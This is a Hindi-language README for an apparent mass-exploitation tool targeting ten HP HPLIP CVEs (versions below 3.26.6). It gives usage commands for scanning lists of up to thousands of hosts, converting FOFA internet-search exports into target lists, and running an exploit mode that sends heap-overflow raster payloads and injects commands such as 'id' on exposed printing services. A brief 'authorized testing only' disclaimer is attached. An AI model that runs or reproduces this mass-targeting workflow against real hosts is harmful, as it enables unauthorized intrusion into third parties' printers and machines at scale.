massexploit — HP HPLIP मास CVE चेकर (2026-09)
HP HPLIP < 3.26.6 के लिए मास चेक और रिसर्च एक्सप्लॉइट ड्राइवर — CVE-2026-91097 से CVE-2026-91106 तक।
| CVE | CVSS 4 | CWE | रिमोट |
|---|
| CVE-2026-91097 | 7.0 | CWE-787 | हाँ (UI) |
| CVE-2026-91098 | 8.6 | CWE-122 | हाँ (UI) |
| CVE-2026-91099 | 5.1 | CWE-61 | लोकल |
| CVE-2026-91100 | 6.8 | CWE-78 | लोकल |
| CVE-2026-91102 | 8.4 | CWE-78 | लोकल |
| CVE-2026-91101 | 5.1 | CWE-129 | फिजिकल |
| CVE-2026-91103 | 5.1 | CWE-191 | फिजिकल |
| CVE-2026-91104 | 9.3 | CWE-122 | हाँ |
| CVE-2026-91105 | 8.6 | CWE-122 | हाँ (UI) |
| CVE-2026-91106 | 9.3 | CWE-122 | हाँ |
फिक्स्ड: HPLIP 3.26.6+
सारांश
FOFA body="hplip" हिट्स अक्सर :8000 PAPPL होते हैं, :2207 नहीं। टारगेट लिस्ट में host:port का उपयोग करें।
स्क्रीनशॉट (--flow मास चेक)

आवश्यकताएँ
- Python 3.9+
pip install -r requirements.txt
उपयोग
pip install -r requirements.txt
# Single target (default ports 631, 2207, 9100 if no port given)
python poc.py -u 192.0.2.10 --mode check
# FOFA port (recommended)
python poc.py -u 192.0.2.10:8000 --mode check --flow
# Mass — all 10 CVEs
python poc.py --list targets.example.txt --mode check -j 30 -q --flow
# Critical network heap CVEs only
python poc.py --list list_hplip_printer.txt --mode check --cve CVE-2026-91104,CVE-2026-91106
# Exploit research (PAPPL on :8000 → IPP raster; -c id only meaningful on hpssd:2207)
python poc.py -u 192.0.2.10:8000 --mode exploit --cve CVE-2026-91106
python poc.py -u 192.0.2.10:2207 --mode exploit --cve CVE-2026-91100 -c id
FOFA → टारगेट लिस्ट
# Save export as fofa_csv_1049.csv (or pass -i)
python fofa_to_list.py
# list.txt (all) + list_hplip_printer.txt (title hint = HPLIP Printer Application)
python poc.py --list list_hplip_printer.txt --mode check -j 30 --flow
टारगेट लिस्ट फॉर्मेट
192.0.2.10:8000
192.0.2.11:2207
192.0.2.12|CVE-2026-91106
|CVE… वाली लाइनें | से पहले के हिस्से को होस्ट के रूप में उपयोग करती हैं (हिट्स आउटपुट के लिए वैकल्पिक CVE संकेत)।
CLI
आउटपुट
| फ़ाइल | सामग्री |
|---|
massexploit_results.jsonl | प्रति होस्ट पूर्ण JSON |
hits.txt | कैंडिडेट्स (host|cve,…) |
सामान्य चेक status मान
| स्टेटस | अर्थ |
|---|
hplip_surface_candidate | ओपन पोर्ट + वर्ज़न/CVE मैपिंग |
network_surface_version_unknown |
एक्सप्लॉइट अपेक्षाएँ
| स्टेटस | अर्थ |
|---|
pappl_raster_sent_no_shell_output | PAPPL पोर्ट पर IPP/रास्टर भेजा गया; HTTP में कोई id नहीं (हीप RCE क्लास) |
रिपॉज़िटरी लेआउट
.
├── poc.py
├── cve_catalog.py
├── hplip_probes.py
├── hplip_exploit.py
├── pappl_ipp.py
├── pappl_raster.py
├── fofa_to_list.py
├── image.png
├── targets.example.txt
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
सीमाएँ
- यह सामान्य वेब स्कैनर नहीं है — प्रिंटिंग / HPLIP TCP+HTTP सरफेस।
- PAPPL पर 91104/91106 के लिए कोई सार्वजनिक वेपनाइज़्ड RCE नहीं; रास्टर पाथ ZDI-26-656 के अनुरूप रिसर्च है।
- फिजिकल/लोकल CVEs
--cve all के लिए सूचीबद्ध हैं लेकिन बड़े पैमाने पर रिमोटली एक्सप्लॉइटेबल नहीं हैं।
- केवल अधिकृत परीक्षण।
संदर्भ
कानूनी
केवल अधिकृत सुरक्षा परीक्षण के लिए। लागू कानूनों और कार्यक्रम नियमों का अनुपालन आपकी ज़िम्मेदारी है।